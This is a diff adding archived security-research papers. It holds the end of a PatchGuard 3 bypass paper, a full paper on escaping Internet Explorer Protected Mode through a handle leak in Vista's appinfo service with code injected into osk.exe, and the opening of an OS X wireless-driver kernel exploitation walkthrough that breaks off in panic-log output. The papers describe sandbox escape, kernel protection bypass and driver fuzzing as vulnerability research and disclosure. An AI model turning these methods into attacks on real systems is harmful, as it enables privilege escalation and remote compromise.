previously +described in the cr3 swap technique. If system calls are the only desired +targets to hook, then the cr3 swap can be eliminated as unnecessary for single +processor systems (as it would be safe to make and restore changes to the +actual underlying physical pages before and after a DPC dispatcher call, using +the return address on the stack as a way to return to the altered location +without leaving opcodes patched in the kernel across dispatcher invocations). +For multi-processor systems, some mechanism would need to be developed to +allow the MSR swap to be made across DPC dispatchers while preventing code +patches from becoming visible to a second processor. This is necessary +because there could be more than one PatchGuard context executing +simultaneously with the PatchGuard 3 addition of a probability to initialize a +second check context at system boot time. + +In order to block such a technique, Microsoft would likely be best served by +making it difficult to locate all the regions necessary to patch in order to +maintain the deception of an unpatched system across PatchGuard checks. The +principal way to do this would be to create other, alternative launch vectors +for PatchGuard that are unrelated to DPCs and, preferably, do not involve +exported APIs that are easy to intercept from a third party perspective. + +5) Conclusion + +Although PatchGuard 3 does bring some pointed counter-attacks to many +previously disclosed bypass techniques, version 3, like its predecessors, is +hardly immune to being either disabled completely or simply co-existed with. +It is likely that future revisions to PatchGuard will continue to be +vulnerable to a variety of bypass techniques, though it is certain within +Microsoft's reach to counter many of the publicly disclosed bypass vectors. +It is anticipated by the author that until PatchGuard can be implemented with +hardware support, such as via a combination of trusted boot (TPM) and a +permanent hypervisor, future revisions will continue to be vulnerable to +attack from determined individuals. + +On the other hand, Microsoft's efforts with PatchGuard appear to have paid off +so far in terms of preventing a mass-uptake of PatchGuard-violating drivers on +Windows x64. In other words, a case could be made that Microsoft doesn't need +to be perfect with PatchGuard, only "good enough" to give vendors cold feet +about trying to ship products that bypass it. Only time will tell if this +continues to remain the case into the future, however. + +References + +[1] Skywing. Subverting PatchGuard version 2. + http://www.uninformed.org/?v=6&a=1&t=sumry; accessed September 16, 2007 + +[2] Skywing. Programming against the x64 exception handling support, part 7: Putting it all together, or building a stack walking routine. + http://www.nynaeve.net/?p=113; accessed September 16, 2007 + +[3] skape. Improved Automated Analysis of Windows x64 Binaries. + http://uninformed.org/index.cgi?v=4&a=1&t=sumry; accessed September 16, 2007 + +[4] skape, Skywing. Bypassing PatchGuard on Windows x64. + http://uninformed.org/index.cgi?v=3&a=3&t=sumry; accessed September 16, 2007 + +[5] Microsoft. Detours. + http://research.microsoft.com/sn/detours/; accessed September 16, 2007 diff --git a/uninformed/8.3.txt b/uninformed/8.3.txt new file mode 100644 index 0000000..fabcbdf --- /dev/null +++ b/uninformed/8.3.txt @@ -0,0 +1,362 @@ +Getting out of Jail: Escaping Internet Explorer Protected Mode +September, 2007 +Skywing +Skywing@valhallalegends.com +http://www.nynaeve.net + +Abstract: With the introduction of Windows Vista, Microsoft has added a new +form of mandatory access control to the core operating system. Internally +known as "integrity levels", this new addition to the security manager allows +security controls to be placed on a per-process basis. This is different from +the traditional model of per-user security controls used in all prior versions +of Windows NT. In this manner, integrity levels are essentially a bolt-on to +the existing Windows NT security architecture. While the idea is +theoretically sound, there does exist a great possibility for implementation +errors with respect to how integrity levels work in practice. Integrity +levels are the core of Internet Explorer Protected Mode, a new "low-rights" +mode where Internet Explorer runs without permission to modify most files or +registry keys. This places both Internet Explorer and integrity levels as a +whole at the forefront of the computer security battle with respect to Windows +Vista. + +1) Introduction + +Internet Explorer Protected Mode is a reduced-rights operational mode of +Internet Explorer where the security manager itself enforces a policy of not +allowing write access to most file system, registry, and other securable +objects by default. This mode does provide special sandbox file system and +registry space that is permitted to be written to by Internet Explorer when +operating in Protected Mode. + +While there exist some fundamental shortcomings of Protected Mode as it is +currently implemented, such as an inability to protect user data from being +read by a compromised browser process, it has been thought to be effective at +blocking most write access to the system from a compromised browser. The +benefit of this is that if one is using Internet Explorer and a buffer overrun +occurs within IExplore.exe, the persistent impact should be lessened. For +example, instead of having write access to everything accessible to the user's +account, exploit code would instead be limited to being able to write to the +low integrity section of the registry and the low integrity temporary files +directories. This greatly impacts the ability of malware to persist itself or +compromise a computer beyond just IExplore.exe without some sort of user +interaction (such as persuading a user to launch a program from an untrusted +location with full rights, or other social engineering attacks). + +2) Protected Mode and Integrity Levels + +Internally, Protected Mode is implemented by running IExplore.exe as a low +integrity process. With the default security descriptor that is applied to +most securable objects, low integrity processes may not generally request +access rights that map to GENERIC_WRITE for a particular object. As Internet +Explorer does need to be able to persist some files and settings, exceptions +can (and are) carved out for low integrity processes in the form of registry +keys and directories with special security descriptors that grant the ability +for low integrity processes to request write access. Because the IExplore +process cannot write files to a location that would be automatically used +by a higher integrity process, and it cannot request dangerous access +rights to other running processes (such as the ability to inject code via +requesting PROCESS_VM_WRITE or the like), malware that runs in the context of +a compromised IExplore process is (theoretically) fairly contained from the +rest of the system. + +However, this containment only holds as long as the system happens to be free +of implementation errors. Alas, but perhaps not unexpectedly, there are in +fact implementation problems in the way the system manages processes running +at differing integrity levels that can be leveraged to break out of the +Protected Mode (or low integrity) jail. To understand these implementation +errors, it is first necessary to gain a basic working understanding of how the +new integrity-based security model works in Windows. The integrity model is +key to a number of Windows Vista features, including UAC (User Account +Control). + +When a user logs on to a computer in Windows Vista with UAC enabled, their +shell is normally started as a ``medium'' integrity process. Integrity levels +are integers and symbolic designations such as ``low'', ``medium'', ``high'', +or ``system'' are simply used to indicate certain well-known intermediate +values). Medium integrity is the default integrity level even for built-in +administrators (except the default ``Administrator'' account, which is a +special case and is exempted from UAC). Most day to day activity is intended +to be performed at medium integrity; for instance, a word processor program +would be expected to operate at medium integrity, and (theoretically) games +would generally run at medium integrity as well. Games tend to be rather +poorly written in terms of awareness of the security system, however, so this +tends to not really be the case, at least not without added help from the +operating system. Medium integrity roughly corresponds to the environment +that a limited user would run as under previous versions of Windows. That is +to say, the user has read and write access to their own user profile and their +own registry hive, but not write access to the system as a whole. + +Now, when a user launches Internet Explorer, an IExplore.exe process is +launched as low integrity. The default security descriptor for most objects +on Windows prevents low integrity processes from gaining write access to +medium integrity securable objects, as previously mentioned. In reality, the +default security descriptor denies write access to higher integrities, not +just to medium integrity, though in this case the effect is similar in terms +of Internet Explorer. As a result, the IExplore.exe process cannot write +directly to most locations on the system. + +However, Internet Explorer does, in certain cases, need to gain write to +locations outside of the low integrity (Protected Mode) sandbox. For this +task, Internet Explorer relies on a helper process, known as ieuser.exe, which +runs at medium integrity level. There is a tightly controlled RPC interface +between ieuser.exe and IExplore.exe that allows Internet Explorer, running at +low integrity, to request that ieuser.exe display a dialog box asking the user +to, say, choose a save location for a file and then save said file to disk. +This is the mechanism by which one can save files in their home directory even +under Protected Mode. Because the RPC interface only allows IExplore.exe +to use the RPC interface to request that a file to be saved, a program cannot +directly abuse the RPC interface to write to arbitrary locations, at least not +without user interaction. + +Part of the reason why the RPC interface cannot be trivially abused is that +there also exists some protection baked into the window manager that prevents +a thread at a lower integrity level from sending certain, potentially +dangerous, messages to threads at a higher integrity level. This allows +ieuser.exe to safely display user interface on the same desktop as the +IExplore.exe process without malicious code in the Internet Explorer process +simply being able to simulate fake keystrokes in order to cause it to save a +dangerous file to a dangerous location without user interaction. + +Most programs that are integrity-level aware operate with the same sort of +paradigm that Internet Explorer does. In such programs, there is typically a +higher integrity broker process that provides a tightly controlled interface +to request that certain actions be taken, with the consent of the user. For +example, UAC has a broker process (a privileged service) that is responsible +for displaying the consent user interface when the user tries to perform an +administrative task. This operates similar in principal to how Internet +Explorer can provide a security barrier through Protected Mode because the +lower privileged process (the user program) cannot magically elevate itself +to full administrative rights in the UAC case (which runs a program at high +integrity level, as opposed to the default medium integrity level). +Instead, it could only ask the service to display the consent UI, which is +protected from interference by the program requesting elevation due to the +window manager restrictions on sending dangerous messages to a higher +integrity level window. + +2) Breaking the Broker + +If one has been using Windows Vista for some time, none of the behavior that +has just been described should come across as new. However, there are some +cases that have not yet been discussed which one might have observed from time +to time with Windows Vista. For example, although programs are typically +restricted from being able to synthesize input across integrity levels, there +are some limited circumstances where this is permitted. One easy to see +instance of this is the on-screen keyboard program (osk.exe) which, despite +running without a UAC prompt, can generate keyboard input messages that are +transmitted to other processes, even elevated administrative processes. This +would at first appear to be a break in the security system; questions along +the lines of "If one program can magically send keystrokes to higher integrity +processes, why can't another?" come to mind. However, there are in fact some +carefully-designed restrictions that are intended to prevent a user (or a +program) from arbitrarily being able to execute custom code with this ability. + +First of all, in order to request special access to send unrestricted keyboard +input, a program's main executable must resolve to a path within the Program +Files or Windows directory. Although the author feels that such a check is +essentially a giant hack at best, it does effectively prevent a "plain user" +running at medium integrity from being able to run custom code that can +synthesize keystrokes to high integrity processes, as a plain user would not +be able to write to any of these directories. Additionally, any such program +must also be signed with a valid digital signature from any trusted code +signing root. This is a fairly useless check from a security perspective, in +the author's opinion, as anybody can pay a code signing authority to get a +code signing certificate in their own name; code signing certificates are not +a guarantee of malware-free (or even bug-free) code. Although it would be +easy to bypass the second check with a payment to a certificate issuing +authority, a plain user cannot so easily bypass the first check relating to +the restriction on where the program main executable may be located. + +Even if a user cannot launch custom code directly as a program with access to +simulate keystrokes to higher integrity processes (known as "uiaccess" +internally), one would tend to get the impression that it would be possible to +simply inject code into a running osk.exe instance (or other process with +uiaccess). This fails as well, however; the process that is responsible for +launching osk.exe (the same broken service that is responsible for launching +the UAC consent user interface, the "Application Information" (appinfo) +service) creates osk.exe with a higher than normal integrity level in order to +use the integrity level security mechanism to block users from being able to +inject code into a process with access to simulate keystrokes. + +When the appinfo service receives a request to launch a program that may +require elevation, which occurs when ShellExecute is called to start a +program, it will inspect the user's token and the application's manifest to +determine what to do. The application manifest can specify that a program +runs with the user's integrity level, that it needs to be elevated (in which +case a consent user interface is launched), that it should be elevated if and +only if the current user is a non-elevated administrator (otherwise the +program is to be launched without elevation), or that the program requests the +ability to perform keystroke simulation to high integrity processes. + +In the case of a launch request for a program requesting uiaccess, +appinfo!RAiLaunchAdminProcess is called to service the request. The process +is then verified to be within the (hardcoded) set of allowed directories by +appinfo!AiCheckSecureApplicationDirectory. After validating that the program +is being launched from within an allowed directory, control is eventually +passed to appinfo!AiLaunchProcess which performs the remaining work necessary +to service the launch request. At this point, due to the "secure" application +directory requirement, it is not possible for a limited user (or a user +running with low integrity, for that matter) to place a custom executable in +any of the "secure" application directories. + +Now, the appinfo service is capable of servicing requests from processes of +all integrity levels. Due to this fact, it needs to be capable of determining +the correct integrity level to create a new process from at this point. +Because the new process is not being launched as a full administrator in the +case of a process requesting uiaccess, no consent user interface is displayed +for elevation. However, the appinfo service does still need a way to protect +the new process from any other processes running as that user (as access to +synthesize keystrokes is considered sensitive). For this task, the +appinfo!LUASetUIAToken function is called by appinfo to protect the new +process from other plain user processes running as the calling user. This +is accomplished by adjusting the token that will be used to create the new +process to run at a higher integrity level than the caller, unless the +caller is already at high integrity level (0x3000). The way LUASetUIAToken +does this is to first try to query the linked token associated with the +caller's token. A linked token is a second, shadow token that is assigned +when a computer administrator logs in with UAC enabled; in the UAC case, +the user normally runs as a restricted version of themselves, without their +administrative privileges (or Administrators group membership), and at +medium integrity level. + +If the calling user does indeed have a linked token, LUASetUIAToken retrieves +the integrity level of the linked token for use with the new process. +However, if the user doesn't have a linked token (i.e. they are logged on as a +true plain user and not an administrator running without administrative +privileges), then LUASetUIAToken uses the integrity level of the caller's +token instead of the token linked with the caller's token (in other words, the +elevation token). In the case of a computer administrator this approach would +normally provide sufficient protection, however, for a limited user, there +exists a small snag. Specifically, the integrity level that LUASetUIAToken +has retrieved matches the integrity level of the caller, so the caller would +still have free reign over the process. + +To counteract this issue, there is an additional check baked into +LUASetUIAToken to determine if the integrity level that was selected is at (or +above) high integrity. If the integrity level is lower than high integrity, +LUASetUIAToken adds 16 to the integrity level (although integrity levels are +commonly thought of as just having four values, that is, low, medium, high, +and system, there are 0x1000 unnamed integrity levels in between each named +integrity level). So long as the numeric value of the integrity level chosen +is greater than the caller's integrity level, the new process will be +protected from the caller. In the case of the caller already being a full, +elevated administrator, there's nothing to protect against, so LUASetUIAccess +doesn't attempt to raise the integrity level above high integrity. + +After determining a final integrity level, LUASetUIAToken changes the +integrity level in the token that will be used to launch the new process to +match the desired integrity level. At this point, appinfo is ready to create +the process. If needed, the user profile block is loaded and an environment +block is created, following which advapi32!CreateProcessAsUser is called to +launch the uiaccess-enabled application for the caller with a raised integrity +level. After the process is created, the output parameters of +CreateProcessAsUser are marshalled back into the caller's process, and +AiLaunchProcess signals successful completion to the caller. + +If one has been following along so far, the question of ``How does all of this +relate to Internet Explorer Protected Mode'' has probably crossed one's mind. +It turns out that there's a slight deficiency in the protocol outlined above +with respect to creating uiaccess processes. The problem lies in the fact +that AiLaunchProcess returns the output parameters of CreateProcessAsUser back +to the caller's process. This is dangerous, because in the Windows security +model, security checks are done when one attempts to open a handle; after a +handle is opened, the access rights requested are forever more associated with +that handle, regardless of who uses the handle. In the case of appinfo, this +turns out to be a real problem because appinfo, being the creator of the new +process, is handed back a thread and process handle that grant full access to +the new thread and process, respectively. Appinfo then marshals these handles +back to the caller (which may be running at low integrity level). At this +point, a privilege escalation problem has occured; the caller has been +essentially handed the keys to a higher integrity process. While the caller +would never normally be able to open a handle to the new process on its own, +in this case, it doesn't have to, as the appinfo service does so on its behalf +and returns the handles back to it. + +Now, in the ShellExecute case, the client stub for the appinfo +AiLaunchAdminProcess routine doesn't want (or need) the process or thread +handles, and closes them immediately after. However, this is obviously not a +security barrier, as this code is running in the untrusted process and could +be patched out. As such, there exists a privilege escalation hole of sorts +with the appinfo service. It can be abused to, without user interaction, leak +a handle to a higher integrity process to a low integrity process (such as +Internet Explorer when operating in Protected Mode). Furthermore, even +Internet Explorer in Protected Mode, running at low integrity, can request to +launch an already-existing uiaccess-flagged executable, such as osk.exe (which +is conveniently already in a "secure" application directory, the Windows +system directory). With a process and thread handle as returned by appinfo, +it is possible to inject code into the new process, and from there, as they +say, the rest is history. + +3) Caveats + +Although the problem outlined in this article is indeed a privilege escalation +hole, there are some limitations to it. First of all, if the caller is +running as a plain user instead of a non-elevated administrator, appinfo +creates the uiaccess process with integrity level 0x1010 (low integrity + 16). +This is still less than medium integrity (0x2000), and thus in the true +limited user case, the new process, while protected from other low integrity +processes, is still unable to interfere with medium integrity processes +directly. + +In the case where a user is running as an administrator but is not elevated +(which happens to be the default case for most Windows Vista users), it is +true that appinfo.exe returns a handle to a process running at high integrity +level. However, only the integrity level is changed; the process is most +certainly not an administrator (and in fact has BUILTIN\Administrators as a +deny only SID). This does mean that the new process is quite capable of +injecting code into any processes the user has started though (with zero user +interaction). If the user happens to already have a high integrity process +running on the desktop as a full administrator, the new process could be used +to attack it as the process would be running at the same integrity level and +it would additionally be running as the same user. This means that in the +default configuration, this issue can be used to escape from Protected Mode, +but one is still not given full-blown administrative access to the system. +However, any location in the user profile directory could be written to. This +effectively eliminates the security benefit of Protected Mode for a +non-elevated administrator (with respect to treating the user as a plain +user). + +Source code to a simple program to demonstrate the appinfo service issue is +included with the article. The problem is at this point expected to be fixed +by Windows Vista Service Pack 1 and Windows Server 2008 RTM. The sample code +launches osk.exe with ShellExecute, patches out the CloseHandle calls in +ShellExecute to retain the process and thread handles, and then injects a +thread into osk.exe that launches cmd.exe. The sample program also includes a +facility to create a low integrity process to verify correct function; the +intended use is to launch a low integrity command shell, verify that +directories such as the user profile directory cannot be written to, and then +use the sample program from the low integrity process to launch a medium +integrity cmd.exe instance without user interaction, which does indeed have +free reign of the user profile directory. The same code will operate in the +context of Internet Explorer in Protected Mode, although in the interest of +keeping the example clear and concise, the author has not included code to +inject the sample program in some form into Internet Explorer (which would +simulate an attack on the browser). + +Note that while the uiaccess process is launched as a high integrity process, +it is configured such that unless a token is explicitly provided that requests +high integrity, new child processes of the uiaccess process will launch as +medium integrity processes. It is possible to work around this issue and +retain high integrity with the use of CreateProcessAsUser by code injected +into the uiaccess process if desired. However, as described above, simply +retaining high integrity does not provide administrative access on its own. +If there are no other high integrity processes running as the current user on +the current desktop, running as high integrity and running as medium integrity +with the non-elevated token are functionally equivalent, for all intents and +purposes. + +4) Conclusion + +UAC, Internet Explorer Protected Mode, and the integrity level model represent +an entirely new way of thinking about security in the Windows world. +Traditionally, Windows security has been a user-based model, where all +processes that execute as a user were considered equally trusted. Windows +Vista and Windows Server 2008 are the first steps towards changing this model +to support the concept of a untrusted process (as opposed to an untrusted +user). While this has the potential to significantly benefit end user +security, as is the case with Internet Explorer Protected Mode, there are +bound to be bumps along the way. Writing an integrity level broker process is +difficult. It is very easy to make simple mistakes that compromise the +security of the integrity level mechanism, as the appinfo issue highlights. +The author would like to think that by shedding light on this type of +programming error, future issues of a similar vein may be prevented before +they reach end users. diff --git a/uninformed/8.4.txt b/uninformed/8.4.txt new file mode 100644 index 0000000..b85ae04 --- /dev/null +++ b/uninformed/8.4.txt @@ -0,0 +1,1383 @@ +OS X Kernel-mode Exploitation in a Weekend +September, 2007 +David Maynor +dave@erratasec.com +http://www.erratasec.com/ + +Abstract: Apple's Mac OS X operating system is attracting more +attention from users and security researchers alike. Despite this increased +interest, there is still an apparent lack of detailed vulnerability +development information for OS X. This paper will attempt to help bridge this +gap by walking through the entire vulnerability development process. This +process starts with vulnerability discovery and ultimately finished with a +remote code execution. To help illustrate this process, a real vulnerability +found in the OS X wireless device driver is used. + +1) Introduction + +OS X has a strange place in the hearts and the minds of the research +community. Security researchers, like most other users, enjoy a well-built and +reliable hardware platform topped off by an operating system with a slick +interface. Switch gears from the users experience to a more research-oriented +focus and problems start to appear. Researchers have historically explored +and documented internals of operating systems like Microsoft's Windows and +open source counterparts such as Linux and BSD variants. The knowledge gaps +for OS X are in no way a show stopper for researching security vulnerabilities +on OS X; still, they prove to be a frustrating speed bump. While static +analysis of binaries in a Windows environment may be trivial, the same +cannot be said to be true on OS X. This document contains information +collected from a variety of sources after discovering a flaw in a wireless +device driver for OS X. + +Before the accidental discovery of the wireless flaw, the author knew next to +nothing about the internals of OS X, the ``xnu'' kernel. Google, in a rare +failure, also provided next to no help. All the articles the author +encountered only narrowly covered a topic without talking about how one could +go about building a useful research environment. Many of these articles +talked about something each respective author discovered without showing how +others could rediscover it. For this reason, the author includes tips +throughout this paper in the form of sections entitled ``Things I wish Google +told me''. + +The Test Network + +Many elements are required when finding and duplicating a wireless +vulnerability. Since the target for the attack described in this paper is +running the OS X operating system, at least two OS X machines are needed for +kernel debugging with gdb (the ``GNU Debugger''). A third computer with a +D-Link WDA-2320 Atheros based card is used as the attacking machine. The +attacking machine uses a small Linux based distribution that runs from a CD +called BackTrack2. BackTrack2 is used because it includes many special 802.11 +drivers that are capable of raw packet injection, a feature that most wifi +drivers (frustratingly) lack. + +The author's initial research on the subject described in this paper made use +of a patched version of ``Madwifi-old'' with LORCON. Madwifi is the name of +the open-source drivers for chipsets from Atheros. LORCON is a wifi fuzzing +tool written by Josh Wright. Since quick and flexible packet generation is +important, the original tool used for this research was ``scapy'', a packet +creation engine written in Python. The examples in this paper, written almost +one year later, make use of the Metasploit LORCON integration and are written +in Ruby. + +To help provide some perspective on the research environment used in this +document, the following three machine configurations should be referenced: + +Target Machine + +Hardware: Mac Mini, 1.66Ghz, 512MB RAM +OS Version: 10.4.7 +IP Address: 192.168.1.20 +Role: The target machine is the victim in the testing scenario. It is running +a vulnerable version of the OS X Atheros driver. + +Dev Machine + +Hardware: Macbook, 2GHz Intel Core Duo, 1 GB RAM +OS Version: 10.4.7 +IP Address: 192.168.1.1 +Role: This machine runs gdb for connection to the target machine. It is also +setup as a core dump server, but that functionality appears broken. This box +will also archive the panic logs and register information along with stack +traces. This is the primary machine for single step debugging. + +Attack Machine + +Hardware: Generic shuttle PC, Pentium 3, 512MB RAM +OS Version: Backtrack2 Bootable Linux CD +IP Address: 192.168.1.50 +Role: This is the attacking machine. The attack initially launched from a Dell +Laptop with a PCMCIA card. This machine is close to the same specifications +with an Atheros based D-Link card. The attacks are in Ruby using the +Metasploit framework integration with LORCON. + +2) Vulnerability Discovery + +One of the major staples in a researcher's toolbox is binary analysis (where +``binary'' refers to compiled software code). Vulnerability research and +discovery on OS X is no different in this regard. However, performing binary +analysis on OS X requires some understanding of the underlying binary file +format that is used. On OS X, Apple uses a universal binary file format +called a Mach-O. In this context, a universal binary will execute on both +Intel and PPC based machines. It accomplishes this by combining a compiled +binary version of the program for each processor in an archive like format +with a header that contains specific information relating to each processor +type. The universal binary header is detected at runtime causing the correct +compiled code for the platform to execute. + +Although universal binaries provide an elegant solution for an operating +system that supports multiple architectures, it leads to problems when +performing binary analysis because not many tools support the file format at +the time of this writing. Recently, IDA Pro added support for the binary +format in 5.1. Prior to 5.1, reversing a universal binary required manual +manipulation or scripting in an IDC. + + Things I wish Google Told me: Disassembling OS X binaries + + Apple provides tools that support the manipulation of universal binaries which + are capable of creating a simplified binary suitable for hassle free loading + into IDA Pro. One of these tools, ``lipo'', allows a researcher to extract the + relevant chunk of compiled code from a universal binary. The following gives + a quick example of using lipo on the Atheros driver from OS X 10.4.7. This + will create a thin file called at.i386 that is suitable for loading into IDA + Pro without the confusing archive headers and with the older PowerPC code. + + lipo -thin i386 AirPortAtheros5424 -output at.i386 + +The vulnerability featured in this paper is a flaw in Apple's wireless device +driver. This flaw was discovered through ``beacon'' and ``probe response'' +fuzzing. Beacons are the packets that wireless access points broadcast +several times a second to announce their presence to the world. They are also +the packets that your notebook computer uses in order to build a list of +nearby access-points. Probe-responses are similar packets that are used when +a notebook computer probes for access points that are not otherwise +broadcasting. + +The bug described in this paper was found by the author while performing +fuzzing experiments against other machines. During this time, one of the +Macbooks in the vicinity running OS X 10.4.6 crashed unexpectedly. This crash +produced a file called panic.log in /Library/Logs. A panic.log file contains +information to help debug a kernel panic or crash on OS X. This includes the +output of all the registers, a stack trace and the load address of the +offending module and the address of its dependent modules. This information +provides a great starting place to help track down a driver problem. However, +in its default form, there are several shortcomings. The most apparent +shortcoming is that the stack trace does not include symbol information. As +such, one sees addresses rather than function names. In order to begin to +track down a problem, one needs to do some basic math to manually discover the +names of the functions. Luckily, the loading offsets did not change much on +the test machine when reproducing this issue. + +The following output shows an example panic.log: + +panic(cpu 0 caller 0x0019CADF): +Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: +CR0: 0x8001003b, CR2: 0x62413863, CR3: 0x021d7000, CR4: 0x000006e0 +EAX: 0x62413862, EBX: 0x00000003, ECX: 0x0c67bc8c, EDX: 0x00000003 +ESP: 0x62413863, EBP: 0x0c67bad4, ESI: 0x03717804, EDI: 0x0371787c +EFL: 0x00010202, EIP: 0x008c923d, CS: 0x00000008, DS: 0x0c670010 + +Backtrace, Format - Frame : Return Address (4 potential args on stack) +0xc67b954 : 0x128b5e (0x3bc46c 0xc67b978 0x131bbc 0x0) +0xc67b994 : 0x19cadf (0x3c18e4 0x0 0xe 0x3c169c) +0xc67ba44 : 0x197c7d (0xc67ba58 0xc67bad4 0x8c923d 0x48) +0xc67ba50 : 0x8c923d (0x48 0x10 0x1e200010 0xc670010) +0xc67bad4 : 0x8c7303 (0x371787c 0x1e202d0d 0x8 0x5) +0xc67bb24 : 0x8bccb9 (0x3699804 0xc67bc8c 0x1e202800 0x80) +0xc67bb84 : 0x8cd799 (0x369b46c 0xc67bc8c 0x1e202800 0x80) +0xc67bce4 : 0x8ddbd9 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) +0xc67bd34 : 0x8ce9a5 (0x369b46c 0x1e20cb00 0x36bbc04 0x80) +0xc67be24 : 0x8de86a (0x369b46c 0x1e20cb00 0x36bbc04 0x46) +0xc67bf14 : 0x38dd6d (0x369b29c 0x354d080 0x1 0x36a7e58) +0xc67bf64 : 0x38cf19 (0x354d080 0x135d18 0x0 0x36a7e58) +0xc67bf94 : 0x38cc3d (0x3575140 0x3575140 0x0 0x450) +0xc67bfd4 : 0x197b19 (0x3575140 0x0 0x36a80d0 0x3) +Backtrace terminated-invalid frame pointer 0x0 + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AirPortAtheros5424(104.1)@0x8bb000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x672000 + dependency: com.apple.iokit.IOPCIFamily(2.0)@0x563000 + dependency: com.apple.iokit.IO80211Family(112.1)@0x8a2000 + +When an OS X driver is loaded into IDA, the offsets are all relative to 0. In +order to find the address where a kernel driver crashed you subtract the last +address associated with the module from the stack trace from the module load +address. You then subtract 0x1000 from the result because kernel modules are +loaded in a page aligned fashioned. Here is a typical panic.log from +/Library/Logs created for this example. + +panic(cpu 1 caller 0x0019CADF): +Unresolved kernel trap (CPU 1, Type 14=pagefault), registers: +CR0: 0x80010033, CR2: 0x00000004, CR3: 0x02209000, CR4: 0x000006a0 +EAX: 0x00000000, EBX: 0x00111111, ECX: 0x000005c3, EDX: 0x00000039 +ESP: 0x00000004, EBP: 0x0c74b758, ESI: 0x00111111, EDI: 0x0345bbf0 +EFL: 0x00010206, EIP: 0x0090df95, CS: 0x00000008, DS: 0x03a10010 + +Backtrace, Format - Frame : Return Address (4 potential args on stack) +0xc74b5d8 : 0x128b5e (0x3bc46c 0xc74b5fc 0x131bbc 0x0) +0xc74b618 : 0x19cadf (0x3c18e4 0x1 0xe 0x3c169c) +0xc74b6c8 : 0x197c7d (0xc74b6dc 0xc74b758 0x90df95 0x110048) +0xc74b6d4 : 0x90df95 (0x110048 0x2920010 0x10 0x3a10010) +0xc74b758 : 0x8f2083 (0x345a000 0x111111 0xc74b778 0x800016c3) +0xc74b7a8 : 0x9112b7 (0x36d5804 0x90df78 0x345a000 0x3a1f5a5) +0xc74b7c8 : 0x9115b9 (0x345a000 0x345a46c 0x345bdb8 0x196fc1) +0xc74b808 : 0x8dec91 (0x345a000 0x36d6800 0xc74b828 0x0) +0xc74ba08 : 0x8d600c (0x368a360 0x3a1f5a5 0x6 0x339c91) +0xc74bcb8 : 0x38e698 (0x345a000 0x8 0x3a1f5a5 0x0) +0xc74bcf8 : 0x8d5284 (0x35aa900 0x8d5c7c 0x8 0x3a1f5a5) +0xc74bd38 : 0x3a3d5c (0x345a000 0x8 0x3a1f5a5 0x0) +0xc74bd88 : 0x18a83d (0x36f8d00 0x0 0x3a1f5a4 0x22) +0xc74bdd8 : 0x12b389 (0x3a1f57c 0x39c756c 0x0 0x0) +0xc74be18 : 0x124902 (0x3a1f500 0x0 0x50 0xc74befc) +0xc74bf28 : 0x193034 (0xc74bf54 0x0 0x0 0x0) Backtrace continues... + Kernel loadable modules in backtrace (with dependencies): + com.apple.driver.AirPortAtheros5424(104.1)@0x8e7000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000 + dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000 + dependency: com.apple.iokit.IO80211Family(112.1)@0x8ce000 + com.apple.iokit.IO80211Family(112.1)@0x8ce000 + dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x873000 + dependency: com.apple.iokit.IOPCIFamily(2.0)@0x57e000 + +Kernel version: +Darwin Kernel Version 8.7.1: Wed Jun 7 16:19:56 PDT 2006; + root:xnu-792.9.72.obj~2/RELEASE_I386 + +The AirPort Atheros module has a load address of 0x8e7000 which rules out the +first three entries in the stack trace as being found within this driver. The +fourth entry, 0x90df95, is within the range of the driver. By performing a +few quick calculations, it is possible to calculate the relative offset into +the associated driver's binary: + + 0x90df95 +- 0x8e7000 +- 0x1000 = 0x25f95 + +Opening the driver in IDA Pro and then jumping to offset 0x25f95 will yield +the following code from athcopyscanresults: + +__text:00025F87 mov esi, [ebp+arg_4] +__text:00025F8A mov edi, eax +__text:00025F8C add edi, 1BF0h +__text:00025F92 mov eax, [esi+60h] +__text:00025F95 movzx ecx, byte ptr [eax+4] +__text:00025F99 mov eax, ecx +__text:00025F9B shr al, 3 + +Looking at this crash log, one of the first lines quickly gives insight into +how to analyze this dump: + +panic(cpu 1 caller 0x0019CADF): Unresolved kernel trap (CPU 1, Type 14=pagefault) + +A page fault usually means that some code tried to access an invalid address. +In a case such as this, the CR2 register (shown with the gdb with info +registers) will contain the offending address Intel processors contain a whole +set of non general-purpose registers like CR2 that are used for hardware and +driver debugging. These are registers that one would not normally interact +with when debugging userland code. In this case, the offending address is +0x00000004. Looking at the instruction that commits the page fault one can +see a dereference of EAX: movzx ecx, byte ptr [eax+4]. The EAX register is +zero so the value of CR2 came from the machine adding 4 to the address of in +EAX. By looking at the binary values, one can determine that this panic log +was caused by a NULL pointer dereference in the wireless device driver. +Although it is a bit out of the scope for this document, the three addresses +that precede the Atheros address in the stack trace are: + +0x128b5e panic +0x19cadf panic_trap +0x197c7d trap_from_kernel + +When performing OS X kernel auditing and exploit development, these three +address will become a very familiar site in a panic log, so get used to +ignoring the first three and starting at the fourth address. + +3) The Flaw + +Standard exploit development techniques rarely work well when applied to +kernel-level vulnerabilities. The kernel environment is much less friendly to +the exploit writer than user mode. Each specific vulnerability will likely +require custom techniques. The flaw described in the previous chapter was +found in the driver provided by Apple in their Mac OS X version 10.4.7 on +Macbooks and Mac Minis running on an Intel processor. This flaw allows an +attacker to compromise and gain complete control of a targeted machine. Since +the flaw requires a targeted machine to receive and process a wireless +management frame, the attacker must be within range in order to transmit the +frame In addition, OS X discards valid frames with a weak signal, so the +attacker has to be especially close to the victim machine. + +As was described above, this flaw was discovered accidentally while fuzz +testing other devices. The ``scapy'' fuzzing tool was used to generate +wireless management frames with a random numbers of Information Elements (IEs) +of random sizes that were then transmitted to the broadcast address The beacon +packets sent by access points contain a number of variable-length IEs such as +the advertising SSID, the list of supported speeds, the country is works in, +authentication information, channels, time, timezone, and vendor-specific +information, such as how to find the music containing your Zune media player. +The Macbook crashed due to a page fault caused by the wireless driver during +the processing of one of these fuzz packets. The panic log showed arbitrary +memory corruption in the form of overwriting values in source or destination +copies in memory. Three crash dumps which are described below clearly show +that memory was corrupted during the handling of these fuzz packets. + +Example 1: Attempt to access 0x62413863: + +panic(cpu 0 caller 0x0019CADF): +Unresolved kernel trap (CPU 0, Type 14=pagefault), registers: +CR0: 